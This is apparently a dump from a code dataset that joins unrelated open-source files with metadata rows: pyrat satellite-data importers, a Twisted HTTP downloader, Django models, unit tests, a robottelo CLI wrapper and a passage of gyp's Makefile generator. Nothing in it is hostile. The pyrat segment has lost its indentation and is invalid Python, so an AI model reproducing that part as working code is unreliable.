**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'PALSAR'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(PALSAR, self).__init__(*args, **kwargs)
self.name = "PALSAR IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/VOL*")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: volume file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "PALSAR"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(PALSAR)
def palsar(*args, **kwargs):
return PALSAR(*args, **kwargs).run(*args, **kwargs)
class Radarsat2(pyrat.ImportWorker):
"""
Import of Radarsat-2 satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Radarsat-2'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(Radarsat2, self).__init__(*args, **kwargs)
self.name = "RADARSAT-2 IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/product.xml")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: product.xml file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "Radarsat-2"
metain = self.ds.GetMetadata()
meta.update(metain)
meta['CH_pol'] = []
for band in self.band:
metain = band.GetMetadata()
meta['CH_pol'].append(metain['POLARIMETRIC_INTERP'])
meta.update(metain)
return meta
@pyrat.docstringfrom(Radarsat2)
def radarsat2(*args, **kwargs):
return Radarsat2(*args, **kwargs).run(*args, **kwargs)
class Sentinel1(pyrat.ImportWorker):
"""
Very basic import of Sentinel-1 satellite data. The current driver uses GDAL and therefore does not
perform debursting and combination of subswaths. This routine needs to be improved in future.
**author:** Andreas Reigber\n
**status:** --beta-- Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Sentinel-1 (primitive)'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(Sentinel1, self).__init__(*args, **kwargs)
self.name = "SENTINEL-1 IMPORT"
def reader(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/manifest.safe")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
nswath = len(self.band)
YSize = [band.YSize for band in self.band]
XSize = [band.XSize for band in self.band]
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: manifest.save file not found!")
return False, False
array = []
for band in self.band:
array.append(band.ReadAsArray())
meta = {}
meta['sensor'] = "Sentinel-1"
metain = self.ds.GetMetadata()
meta.update(metain)
return array, meta
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def sentinel1(*args, **kwargs):
return Sentinel1(*args, **kwargs).run(*args, **kwargs)
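# Hedged usage sketch (illustration only; the directory is a placeholder and a
# pyrat session must already be initialised before calling the import wrappers):
# layer = palsar(dir='/path/to/PALSAR_product_directory')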
| mpl-2.0 | -4,090,027,154,837,745,700 | 32.825 | 103 | 0.559128 | false | 3.566784 | false | false | false |
fairbird/OpenPLI-BlackHole | lib/python/Components/Downloader.py | 1 | 2347 | from twisted.web import client
from twisted.internet import reactor, defer, ssl
from urlparse import urlparse
class HTTPProgressDownloader(client.HTTPDownloader):
def __init__(self, url, outfile, headers = None):
client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent='STB HTTP Downloader')
self.status = None
self.progress_callback = None
self.deferred = defer.Deferred()
def noPage(self, reason):
if self.status == '304':
print reason.getErrorMessage()
client.HTTPDownloader.page(self, '')
else:
client.HTTPDownloader.noPage(self, reason)
def gotHeaders(self, headers):
if self.status == '200':
if headers.has_key('content-length'):
self.totalbytes = int(headers['content-length'][0])
else:
self.totalbytes = 0
self.currentbytes = 0.0
return client.HTTPDownloader.gotHeaders(self, headers)
def pagePart(self, packet):
if self.status == '200':
self.currentbytes += len(packet)
if self.totalbytes and self.progress_callback:
self.progress_callback(self.currentbytes, self.totalbytes)
return client.HTTPDownloader.pagePart(self, packet)
def pageEnd(self):
return client.HTTPDownloader.pageEnd(self)
class downloadWithProgress:
def __init__(self, url, outputfile, contextFactory = None, *args, **kwargs):
parsed = urlparse(url)
scheme = parsed.scheme
host = parsed.hostname
port = parsed.port or (443 if scheme == 'https' else 80)
self.factory = HTTPProgressDownloader(url, outputfile, *args, **kwargs)
if scheme == 'https':
from twisted.internet import ssl
if contextFactory is None:
contextFactory = ssl.ClientContextFactory()
self.connection = reactor.connectSSL(host, port, self.factory, contextFactory)
else:
self.connection = reactor.connectTCP(host, port, self.factory)
def start(self):
return self.factory.deferred
def stop(self):
print '[stop]'
self.connection.disconnect()
def addProgress(self, progress_callback):
print '[addProgress]'
self.factory.progress_callback = progress_callback
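# Hedged usage sketch (added for illustration, not part of the original module;
# the URL and output path are placeholders and a running twisted reactor is required).
if __name__ == '__main__':
    def print_progress(current, total):
        print '%d/%d bytes' % (current, total)

    downloader = downloadWithProgress('http://example.com/file.bin', '/tmp/file.bin')
    downloader.addProgress(print_progress)
    downloader.start().addCallbacks(lambda _: reactor.stop(), lambda _: reactor.stop())
    reactor.run()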
| gpl-2.0 | -88,920,652,326,574,430 | 35.107692 | 104 | 0.633149 | false | 4.275046 | false | false | false |
memclutter/clinic-crm | src/timetables/models.py | 1 | 1135 | from django.db import models
class Timetable(models.Model):
DW_MON = 0
DW_TUE = 1
DW_WED = 2
DW_THU = 3
DW_FRI = 4
DAY_OF_WEEK_CHOICES = (
(DW_MON, 'Monday'),
(DW_TUE, 'Tuesday'),
(DW_WED, 'Wednesday'),
(DW_THU, 'Thursday'),
(DW_FRI, 'Friday'),
)
day_of_week = models.IntegerField(choices=DAY_OF_WEEK_CHOICES, null=False, blank=False)
start_time = models.TimeField(null=False, blank=False)
end_time = models.TimeField(null=False, blank=False)
break_start_time = models.TimeField(null=False, blank=False)
break_end_time = models.TimeField(null=False, blank=False)
doctor = models.ForeignKey('clinic.Doctor', on_delete=models.CASCADE)
def __str__(self):
return 'Timetable for "%s" %s %s-%s (%s-%s)' % (
str(self.doctor),
dict(Timetable.DAY_OF_WEEK_CHOICES)[self.day_of_week],
self.start_time,
self.end_time,
self.break_start_time,
self.break_end_time,
)
class Meta:
unique_together = [
['doctor', 'day_of_week'],
]
| bsd-2-clause | 6,153,335,067,055,088,000 | 28.102564 | 91 | 0.56652 | false | 3.092643 | false | false | false |
jorgenschaefer/monads-for-normal-programmers | monads/mathop/test_mathop.py | 1 | 1530 | import unittest
class MathopTest(unittest.TestCase):
CLASS = None
def setUp(self):
if self.CLASS is None:
raise unittest.SkipTest("Base class not tested")
def test_should_chain_computation(self):
self.assertEqual(repr(self.CLASS(5)),
"<MathOp 5>")
self.assertEqual(repr(self.CLASS(5).mul(2)),
"<MathOp 10>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17)),
"<MathOp 27>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17).sub(4)),
"<MathOp 23>")
self.assertEqual(repr(self.CLASS(5).mul(2).div(2)),
"<MathOp 5>")
def test_should_chain_nan(self):
self.assertEqual(repr(self.CLASS(5).div(0)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17).sub(4)),
"<MathOp NaN>")
from monads.mathop import step1, step2_1, step2_2, step3, step4
class TestStep1(MathopTest):
CLASS = step1.MathOp
class TestStep2_1(MathopTest):
CLASS = step2_1.MathOp
class TestStep2_2(MathopTest):
CLASS = step2_2.MathOp
class TestStep3(MathopTest):
CLASS = step3.MathOp
class TestStep4(MathopTest):
CLASS = step4.MathOp
| bsd-2-clause | 3,253,654,990,349,496,000 | 27.333333 | 74 | 0.551634 | false | 3.477273 | true | false | false |
apagac/robottelo-blrm | robottelo/cli/activationkey.py | 3 | 3275 | # -*- encoding: utf-8 -*-
"""
Usage::
hammer activation-key [OPTIONS] SUBCOMMAND [ARG] ...
Parameters::
SUBCOMMAND subcommand
[ARG] ... subcommand arguments
Subcommands::
add-host-collection Associate a resource
add-subscription Add subscription
content-override Override product content defaults
copy Copy an activation key
create Create an activation key
delete Destroy an activation key
host-collections List associated host collections
info Show an activation key
list List activation keys
product-content List associated products
remove-host-collection Disassociate a resource
remove-subscription Remove subscription
subscriptions List associated subscriptions
update Update an activation key
"""
from robottelo.cli.base import Base
class ActivationKey(Base):
"""Manipulates Katello's activation-key."""
command_base = 'activation-key'
@classmethod
def add_host_collection(cls, options=None):
"""Associate a resource"""
cls.command_sub = 'add-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def add_subscription(cls, options=None):
"""Add subscription"""
cls.command_sub = 'add-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def content_override(cls, options=None):
"""Override product content defaults"""
cls.command_sub = 'content-override'
return cls.execute(cls._construct_command(options))
@classmethod
def copy(cls, options=None):
"""Copy an activation key"""
cls.command_sub = 'copy'
return cls.execute(cls._construct_command(options))
@classmethod
def host_collection(cls, options=None):
"""List associated host collections"""
cls.command_sub = 'host-collections'
return cls.execute(cls._construct_command(options))
@classmethod
def product_content(cls, options=None):
"""List associated products"""
cls.command_sub = 'product-content'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_host_collection(cls, options=None):
"""Remove the associated resource"""
cls.command_sub = 'remove-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_repository(cls, options=None):
"""Disassociate a resource"""
cls.command_sub = 'remove-repository'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_subscription(cls, options=None):
"""Remove subscription"""
cls.command_sub = 'remove-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def subscriptions(cls, options=None):
"""List associated subscriptions"""
cls.command_sub = 'subscriptions'
return cls.execute(cls._construct_command(options))
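# Hedged usage sketch (illustration only; the option names are assumptions that
# depend on the hammer CLI version, and `create` comes from the Base class):
#
# ActivationKey.create({'name': 'ak1', 'organization-id': 1})
# ActivationKey.add_subscription({'id': 1, 'subscription-id': 2})
# print(ActivationKey.subscriptions({'id': 1}))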
| gpl-3.0 | -6,796,707,891,215,969,000 | 33.473684 | 67 | 0.620763 | false | 4.816176 | false | false | false |
CIGIHub/greyjay | greyjay/newsletter/migrations/0018_auto_20151015_2253.py | 1 | 1229 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0015_newsletterexternalarticlelink2'),
]
operations = [
migrations.AlterField(
model_name='newsletterarticlelink',
name='article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wagtailcore.Page', help_text='Link to an internal article', null=True),
),
migrations.AlterField(
model_name='newslettereventlink',
name='event',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='events.EventPage', help_text='Link to an event', null=True),
),
migrations.AlterField(
model_name='newsletterexternalarticlelink',
name='external_article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='articles.ExternalArticlePage', help_text='Link to an external article', null=True),
),
]
| mit | -7,314,742,994,192,745,000 | 39.966667 | 199 | 0.651749 | false | 4.056106 | false | false | false |
arangodb/arangodb | 3rdParty/V8/gyp/MakefileWriter.py | 1 | 58894 | import hashlib
import os
import re
import gyp
from gyp import xcode_emulation
from gyp.common import GypError, EnsureDirExists
from gyp.generator.make import generator_default_variables,CalculateVariables
# The .d checking code below uses these functions:
# wildcard, sort, foreach, shell, wordlist
# wildcard can handle spaces, the rest can't.
# Since I could find no way to make foreach work with spaces in filenames
# correctly, the .d files have spaces replaced with another character. The .d
# file for
# Chromium\ Framework.framework/foo
# is for example
# out/Release/.deps/out/Release/Chromium?Framework.framework/foo
# This is the replacement character.
SPACE_REPLACEMENT = '?'
# Header of toplevel Makefile.
# This should go into the build tree, but it's easier to keep it here for now.
_dirname = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_dirname, 'Makefile.tmpl'), 'rt') as f:
file_content = f.read()
SHARED_HEADER = file_content.format(SPACE_REPLACEMENT=SPACE_REPLACEMENT)
SHARED_HEADER_SUFFIX_RULES_COMMENT1 = ("""\
# Suffix rules, putting all outputs into $(obj).
""")
SHARED_HEADER_SUFFIX_RULES_COMMENT2 = ("""\
# Try building from generated source, too.
""")
header = """\
# This file is generated by gyp; do not edit.
"""
# Maps every compilable file extension to the do_cmd that compiles it.
COMPILABLE_EXTENSIONS = {
'.c': 'cc',
'.cc': 'cxx',
'.cpp': 'cxx',
'.cxx': 'cxx',
'.s': 'cc',
'.S': 'cc',
'.m': 'objc',
'.mm': 'objcxx',
}
def WriteRootHeaderSuffixRules(writer):
extensions = sorted(COMPILABLE_EXTENSIONS.keys(), key=str.lower)
writer.write('# Suffix rules, putting all outputs into $(obj).\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n# Try building from generated source, too.\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
def Compilable(filename):
"""Return true if the file is compilable (should be in OBJS)."""
for res in (filename.endswith(e) for e in COMPILABLE_EXTENSIONS):
if res:
return True
return False
# Map from qualified target to path to output.
target_outputs = {}
# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
def Linkable(filename):
"""Return true if the file is linkable (should be on the link line)."""
return filename.endswith('.o')
def Target(filename):
"""Translate a compilable filename to its .o target."""
return os.path.splitext(filename)[0] + '.o'
def EscapeShellArgument(s):
"""
Quotes an argument so that it will be interpreted literally by a POSIX shell.
Taken from http://stackoverflow.com/questions/35817/whats-the-best-way-to-escape-ossystem-calls-in-python
"""
return "'" + s.replace("'", "'\\''") + "'"
def EscapeMakeVariableExpansion(s):
"""Make has its own variable expansion syntax using $. We must escape it for string to be interpreted literally."""
return s.replace('$', '$$')
def EscapeCppDefine(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = EscapeShellArgument(s)
s = EscapeMakeVariableExpansion(s)
# '#' characters must be escaped even embedded in a string, else Make will
# treat it as the start of a comment.
return s.replace('#', r'\#')
def QuoteIfNecessary(string):
"""TODO: Should this ideally be replaced with one or more of the above functions?"""
if '"' in string:
string = '"' + string.replace('"', '\\"') + '"'
return string
def StringToMakefileVariable(string):
"""Convert a string to a value that is acceptable as a make variable name."""
return re.sub('[^a-zA-Z0-9_]', '_', string)
def Sourceify(path):
"""Convert a path to its source directory form."""
if '$(' in path:
return path
if os.path.isabs(path):
return path
return Sourceify.srcdir_prefix + path
Sourceify.srcdir_prefix = ''
def QuoteSpaces(s, quote=r'\ '):
return s.replace(' ', quote)
# TODO: Avoid code duplication with _ValidateSourcesForMSVSProject in msvs.py.
def _ValidateSourcesForOSX(spec, all_sources):
"""
Makes sure if duplicate basenames are not specified in the source list.
Arguments:
spec: The target dictionary containing the properties of the target.
"""
if spec.get('type', None) != 'static_library':
return
basenames = {}
for source in all_sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in ['.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ''
for basename, files in basenames.items():
if len(files) > 1:
error += ' %s: %s\n' % (basename, ' '.join(files))
if error:
        print('static library %s has several files with the same basename:\n'
              '%slibtool on OS X will generate warnings for them.'
              % (spec['target_name'], error))
raise GypError('Duplicate basenames in sources section, see list above')
# noinspection PyAttributeOutsideInit
class MakefileWriter(object):
"""MakefileWriter packages up the writing of one target-specific foobar.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
def __init__(self, generator_flags, flavor):
self.generator_flags = generator_flags
self.flavor = flavor
self.suffix_rules_srcdir = {}
self.suffix_rules_objdir1 = {}
self.suffix_rules_objdir2 = {}
# Generate suffix rules for all compilable extensions.
for ext in COMPILABLE_EXTENSIONS.keys():
# Suffix rules for source folder.
self.suffix_rules_srcdir.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
# Suffix rules for generated source files.
self.suffix_rules_objdir1.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
self.suffix_rules_objdir2.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
def Write(self, qualified_target, base_path, output_filename, spec, configs, part_of_all):
"""
The main entry point: writes a .mk file for a single target.
Arguments:
qualified_target: target we're generating
base_path: path relative to source root we're building in, used to resolve target-relative paths
output_filename: output .mk file name to write
spec: gyp info
configs: gyp info
part_of_all: flag indicating this target is part of 'all'
"""
EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
self.qualified_target = qualified_target
self.path = base_path
self.target = spec['target_name']
self.type = spec['type']
self.toolset = spec['toolset']
self.is_mac_bundle = xcode_emulation.IsMacBundle(self.flavor, spec)
if self.flavor == 'mac':
self.xcode_settings = xcode_emulation.XcodeSettings(spec)
else:
self.xcode_settings = None
deps, link_deps = self.ComputeDeps(spec)
# Some of the generation below can add extra output, sources, or
# link dependencies. All of the out params of the functions that
# follow use names like extra_foo.
extra_outputs = []
extra_sources = []
extra_link_deps = []
extra_mac_bundle_resources = []
mac_bundle_deps = []
if self.is_mac_bundle:
self.output = self.ComputeMacBundleOutput()
self.output_binary = self.ComputeMacBundleBinaryOutput()
else:
self.output = self.output_binary = self.ComputeOutput(spec)
self.is_standalone_static_library = bool(
spec.get('standalone_static_library', 0))
self._INSTALLABLE_TARGETS = ('executable', 'loadable_module', 'shared_library')
if (self.is_standalone_static_library or
self.type in self._INSTALLABLE_TARGETS):
self.alias = os.path.basename(self.output)
install_path = self._InstallableTargetInstallPath()
else:
self.alias = self.output
install_path = self.output
self.WriteLn("TOOLSET := " + self.toolset)
self.WriteLn("TARGET := " + self.target)
# Actions must come first, since they can generate more OBJs for use below.
if 'actions' in spec:
self.WriteActions(spec['actions'], extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all)
# Rules must be early like actions.
if 'rules' in spec:
self.WriteRules(spec['rules'], extra_sources, extra_outputs, extra_mac_bundle_resources)
if 'copies' in spec:
self.WriteCopies(spec['copies'], extra_outputs, part_of_all)
# Bundle resources.
if self.is_mac_bundle:
all_mac_bundle_resources = spec.get('mac_bundle_resources', []) + extra_mac_bundle_resources
self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
self.WriteMacInfoPlist(mac_bundle_deps)
# Sources.
all_sources = spec.get('sources', []) + extra_sources
if all_sources:
if self.flavor == 'mac':
# libtool on OS X generates warnings for duplicate basenames in the same
# target.
_ValidateSourcesForOSX(spec, all_sources)
self.WriteSources(
configs, deps, all_sources, extra_outputs, extra_link_deps,
gyp.xcode_emulation.MacPrefixHeader(self.xcode_settings, lambda p: Sourceify(self.Absolutify(p)), self.Pchify)
)
sources = [x for x in all_sources if Compilable(x)]
if sources:
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT1)
extensions = set([os.path.splitext(s)[1] for s in sources])
for ext in extensions:
if ext in self.suffix_rules_srcdir:
self.WriteLn(self.suffix_rules_srcdir[ext])
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT2)
for ext in extensions:
if ext in self.suffix_rules_objdir1:
self.WriteLn(self.suffix_rules_objdir1[ext])
for ext in extensions:
if ext in self.suffix_rules_objdir2:
self.WriteLn(self.suffix_rules_objdir2[ext])
self.WriteLn('# End of this set of suffix rules')
# Add dependency from bundle to bundle binary.
if self.is_mac_bundle:
mac_bundle_deps.append(self.output_binary)
self.WriteTarget(spec, configs, deps, extra_link_deps + link_deps,
mac_bundle_deps, extra_outputs, part_of_all)
# Update global list of target outputs, used in dependency tracking.
target_outputs[qualified_target] = install_path
# Update global list of link dependencies.
if self.type in ('static_library', 'shared_library'):
target_link_deps[qualified_target] = self.output_binary
# Currently any versions have the same effect, but in future the behavior
# could be different.
if self.generator_flags.get('android_ndk_version', None):
self.WriteAndroidNdkModuleRule(self.target, all_sources, link_deps)
self.fp.close()
def WriteSubMake(self, output_filename, makefile_path, targets, build_dir):
"""Write a "sub-project" Makefile.
This is a small, wrapper Makefile that calls the top-level Makefile to build
the targets from a single gyp file (i.e. a sub-project).
Arguments:
output_filename: sub-project Makefile name to write
makefile_path: path to the top-level Makefile
targets: list of "all" targets for this sub-project
build_dir: build output directory, relative to the sub-project
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
# For consistency with other builders, put sub-project build output in the
# sub-project dir (see test/subdirectory/gyptest-subdir-all.py).
self.WriteLn('export builddir_name ?= %s' %
os.path.join(os.path.dirname(output_filename), build_dir))
self.WriteLn('.PHONY: all')
self.WriteLn('all:')
if makefile_path:
makefile_path = ' -C ' + makefile_path
self.WriteLn('\t$(MAKE)%s %s' % (makefile_path, ' '.join(targets)))
self.fp.close()
def WriteActions(self, actions, extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all):
"""Write Makefile code for any 'actions' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
actions (used to make other pieces dependent on these
actions)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for action in actions:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
action['action_name']))
self.WriteLn('### Rules for action "%s":' % action['action_name'])
inputs = action['inputs']
outputs = action['outputs']
# Build up a list of outputs.
# Collect the output dirs we'll need.
dirs = set()
for out in outputs:
d = os.path.split(out)[0]
if d:
dirs.add(d)
if int(action.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
# Write the actual command.
action_commands = action['action']
if self.flavor == 'mac':
action_commands = [gyp.xcode_emulation.ExpandEnvVars(command, env) for command in action_commands]
command = gyp.common.EncodePOSIXShellList(action_commands)
if 'message' in action:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, action['message']))
else:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, name))
if len(dirs) > 0:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# command and cd_action get written to a toplevel variable called
# cmd_foo. Toplevel variables can't handle things that change per
# makefile like $(TARGET), so hardcode the target.
command = command.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the action runs an executable from this
# build which links to shared libs from this build.
# actions run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn('cmd_%s = LD_LIBRARY_PATH=$(builddir)/lib.host:'
'$(builddir)/lib.target:$$LD_LIBRARY_PATH; '
'export LD_LIBRARY_PATH; '
'%s%s'
% (name, cd_action, command))
self.WriteLn()
outputs = [self.Absolutify(o) for o in outputs]
# The makefile rules are all relative to the top dir, but the gyp actions
# are defined relative to their containing dir. This replaces the obj
# variable for the action rule with an absolute version so that the output
# goes in the right place.
# Only write the 'obj' and 'builddir' rules for the "primary" output (:1);
# it's superfluous for the "extra outputs", and this avoids accidentally
# writing duplicate dummy rules for those outputs.
# Same for environment.
self.WriteLn("%s: obj := $(abs_obj)" % QuoteSpaces(outputs[0]))
self.WriteLn("%s: builddir := $(abs_builddir)" % QuoteSpaces(outputs[0]))
self.WriteSortedXcodeEnv(outputs[0], self.GetSortedXcodeEnv())
for i in inputs:
assert ' ' not in i, ("Spaces in action input filenames not supported (%s)" % i)
for output in outputs:
assert ' ' not in output, ("Spaces in action output filenames not supported (%s)" % output)
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
self.WriteDoCmd(outputs, map(Sourceify, map(self.Absolutify, inputs)), part_of_all=part_of_all, command=name)
# Stuff the outputs in a variable so we can refer to them later.
outputs_variable = 'action_%s_outputs' % name
self.WriteLn('%s := %s' % (outputs_variable, ' '.join(outputs)))
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn()
self.WriteLn()
def WriteRules(self, rules, extra_sources, extra_outputs, extra_mac_bundle_resources):
"""Write Makefile code for any 'rules' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
rules (used to make other pieces dependent on these rules)
"""
env = self.GetSortedXcodeEnv()
for rule in rules:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
rule['rule_name']))
count = 0
self.WriteLn('### Generated for rule %s:' % name)
all_outputs = []
for rule_source in rule.get('rule_sources', []):
dirs = set()
(rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
(rule_source_root, rule_source_ext) = os.path.splitext(rule_source_basename)
outputs = [self.ExpandInputRoot(out, rule_source_root,
rule_source_dirname)
for out in rule['outputs']]
for out in outputs:
d = os.path.dirname(out)
if d:
dirs.add(d)
if int(rule.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(rule.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
inputs = map(Sourceify, map(self.Absolutify, [rule_source] +
rule.get('inputs', [])))
actions = ['$(call do_cmd,%s_%d)' % (name, count)]
if name == 'resources_grit':
# HACK: This is ugly. Grit intentionally doesn't touch the
# timestamp of its output file when the file doesn't change,
# which is fine in hash-based dependency systems like scons
# and forge, but not kosher in the make world. After some
# discussion, hacking around it here seems like the least
# amount of pain.
actions += ['@touch --no-create $@']
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
outputs = [self.Absolutify(o) for o in outputs]
all_outputs += outputs
# Only write the 'obj' and 'builddir' rules for the "primary" output
# (:1); it's superfluous for the "extra outputs", and this avoids
# accidentally writing duplicate dummy rules for those outputs.
self.WriteLn('%s: obj := $(abs_obj)' % outputs[0])
self.WriteLn('%s: builddir := $(abs_builddir)' % outputs[0])
self.WriteMakeRule(outputs, inputs, actions,
command="%s_%d" % (name, count))
# Spaces in rule filenames are not supported, but rule variables have
# spaces in them (e.g. RULE_INPUT_PATH expands to '$(abspath $<)').
# The spaces within the variables are valid, so remove the variables
# before checking.
variables_with_spaces = re.compile(r'\$\([^ ]* \$<\)')
for output in outputs:
output = re.sub(variables_with_spaces, '', output)
assert ' ' not in output, (
"Spaces in rule filenames not yet supported (%s)" % output)
self.WriteLn('all_deps += %s' % ' '.join(outputs))
action = [self.ExpandInputRoot(ac, rule_source_root,
rule_source_dirname)
for ac in rule['action']]
mkdirs = ''
